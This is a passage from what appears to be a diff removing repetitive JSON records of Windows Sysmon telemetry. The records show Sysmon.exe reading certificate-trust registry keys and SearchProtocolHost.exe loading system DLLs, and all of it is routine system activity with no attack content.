"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.StateRepositoryPS.dll", - "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 